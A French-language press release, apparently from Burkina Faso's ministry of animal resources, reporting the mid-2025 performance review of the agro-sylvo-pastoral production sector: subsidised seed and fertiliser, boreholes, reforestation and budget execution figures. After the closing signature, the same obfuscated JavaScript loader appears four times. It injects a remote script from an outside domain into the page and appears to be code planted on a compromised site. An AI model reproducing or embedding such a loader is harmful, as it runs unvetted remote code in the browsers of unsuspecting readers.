𝐒𝐞𝐜𝐭𝐞𝐮𝐫 𝐝𝐞 𝐏𝐥𝐚𝐧𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧 « 𝐏𝐫𝐨𝐝𝐮𝐜𝐭𝐢𝐨𝐧 𝐚𝐠𝐫𝐨-𝐬𝐲𝐥𝐯𝐨-𝐩𝐚𝐬𝐭𝐨𝐫𝐚𝐥𝐞 » : 𝐥𝐞𝐬 𝐩𝐞𝐫𝐟𝐨𝐫𝐦𝐚𝐧𝐜𝐞𝐬 𝐝𝐮 𝐩𝐫𝐞𝐦𝐢𝐞𝐫 𝐬𝐞𝐦𝐞𝐬𝐭𝐫𝐞 𝟐𝟎𝟐𝟓 𝐩𝐚𝐬𝐬𝐞́𝐞𝐬 𝐞𝐧 𝐫𝐞𝐯𝐮𝐞

627

Le ministre délégué auprès du ministre d’État, ministre de l’Agriculture, des Ressources animales et halieutiques, chargé des Ressources animales, Dr Amadou DICKO, a présidé, ce jeudi 7 août 2025 à Ouagadougou, la revue à mi-parcours 2025 du Cadre sectoriel de dialogue « 𝑃𝑟𝑜𝑑𝑢𝑐𝑡𝑖𝑜𝑛 𝑎𝑔𝑟𝑜-𝑠𝑦𝑙𝑣𝑜-𝑝𝑎𝑠𝑡𝑜𝑟𝑎𝑙𝑒 » (CSD/PASP).

Cette session a permis d’examiner et de valider le rapport sectoriel de performance à mi-parcours 2025 de la Politique nationale de développement (PND), ainsi que le plan d’action révisé pour la stabilisation et le développement du secteur.
Selon le ministre délégué, le premier semestre 2025 a été marqué par l’intensification des actions de l’« 𝐎𝐟𝐟𝐞𝐧𝐬𝐢𝐯𝐞 𝐚𝐠𝐫𝐨𝐩𝐚𝐬𝐭𝐨𝐫𝐚𝐥𝐞 𝐞𝐭 𝐡𝐚𝐥𝐢𝐞𝐮𝐭𝐢𝐪𝐮𝐞 𝟐𝟎𝟐𝟑-𝟐𝟎𝟐𝟓 » en vue d’atteindre la souveraineté alimentaire, ainsi que par la mise en œuvre d’initiatives structurantes, telles que l’Initiative présidentielle pour la production agricole et l’initiative « 𝐻𝑒𝑢𝑟𝑒 𝑝𝑎𝑡𝑟𝑖𝑜𝑡𝑖𝑞𝑢𝑒 𝑝𝑜𝑢𝑟 𝑟𝑒𝑣𝑒𝑟𝑑𝑖𝑟 𝑙𝑒 𝐹𝑎𝑠𝑜 ».
Les efforts conjoints du Gouvernement et de ses partenaires ont permis d’engranger des résultats notables. Dans le domaine de la mobilisation des facteurs de production, 9 888 tonnes de semences améliorées et 56 611 tonnes d’engrais ont été distribuées à prix subventionné, tandis que 185 forages à gros débit ont été réalisés.
Les producteurs ont également bénéficié de 6 568 tonnes d’aliments concentrés pour animaux d’élevage, de 1 550 tonnes d’aliments pour poissons, de 455 tonnes de semences fourragères et de 993 cages flottantes, renforçant ainsi les capacités de production dans les filières animales et halieutiques.
En matière de reboisement et de reforestation, la production a atteint 13 594 788 plants, dont 5 815 155 ont été mis en terre. En complément, 383 225 plants de manguiers ont été acquis et distribués aux producteurs dans le cadre de l’« 𝐎𝐟𝐟𝐞𝐧𝐬𝐢𝐯𝐞 𝐚𝐠𝐫𝐨𝐩𝐚𝐬𝐭𝐨𝐫𝐚𝐥𝐞 𝐞𝐭 𝐡𝐚𝐥𝐢𝐞𝐮𝐭𝐢𝐪𝐮𝐞 𝟐𝟎𝟐𝟑-𝟐𝟎𝟐𝟓 ».
Sur le plan financier, le volume total des crédits budgétaires alloués aux investissements s’élève à 306,064 milliards de FCFA. Les dépenses exécutées au premier semestre 2025 représentent 129,506 milliards de FCFA, soit un taux d’exécution sectoriel global de 42,31 %.
Pour le Dr Amadou DICKO, ces acquis doivent être consolidés par une meilleure mobilisation et utilisation des ressources publiques et privées. Il a salué l’engagement de l’ensemble des acteurs et des partenaires techniques et financiers dans la mise en œuvre des actions visant à relever les défis du secteur.
De son côté, le Chef de file des partenaires techniques et financiers du secteur s’est réjoui des résultats obtenus et a insisté sur la nécessité d’unir les efforts pour relever les défis actuels et bâtir un avenir prospère et durable. Il a réaffirmé l’engagement des PTF à accompagner le Gouvernement dans la transformation du secteur et l’amélioration des conditions de vie des populations.
DCRP/MARAH;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);